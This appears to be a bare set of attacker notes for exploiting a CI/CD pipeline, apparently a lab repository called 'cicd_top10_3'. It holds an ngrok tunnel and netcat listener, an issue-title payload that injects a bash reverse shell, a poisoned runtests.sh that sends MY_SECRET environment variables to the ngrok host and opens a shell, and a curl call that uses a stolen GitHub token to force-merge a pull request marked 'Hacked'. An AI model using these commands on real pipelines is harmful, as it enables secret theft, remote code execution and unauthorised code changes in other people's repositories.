ngrok tcp 1000
sudo nc -lvk 1000

New malicious issue title" && bash -i >& /dev/tcp/4.tcp.eu.ngrok.io/18328 0>&1 && echo "

runtests.sh:
env | grep MY_SECRET > /dev/tcp/4.tcp.eu.ngrok.io/18328
bash -i >& /dev/tcp/4.tcp.eu.ngrok.io/18328 0>&1

curl -L \
  -X PUT \
  -H "Accept: application/vnd.github+json" \
  -H "Authorization: Bearer $GITHUB_PAT" \
  -H "X-GitHub-Api-Version: 2022-11-28" \
  https://api.github.com/repos/lgvorg1/cicd_top10_3/pulls/13/merge \
  -d '{"commit_title":"Hacked merged PR","commit_message":"Hacked"}'